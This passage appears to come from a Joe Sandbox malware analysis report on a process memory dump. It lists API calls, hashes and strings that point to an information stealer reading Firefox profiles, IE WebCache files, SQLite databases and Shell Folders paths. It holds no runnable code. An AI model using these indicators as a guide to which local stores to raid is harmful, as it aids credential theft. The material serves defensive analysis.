                                                                                                                                                                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                                                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                                                                  • String ID: }A
                                                                                                                                                                                                                                                                  • API String ID: 1821831730-2138825249
                                                                                                                                                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                                                                  • API String ID: 0-1445880494
                                                                                                                                                                                                                                                                  • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
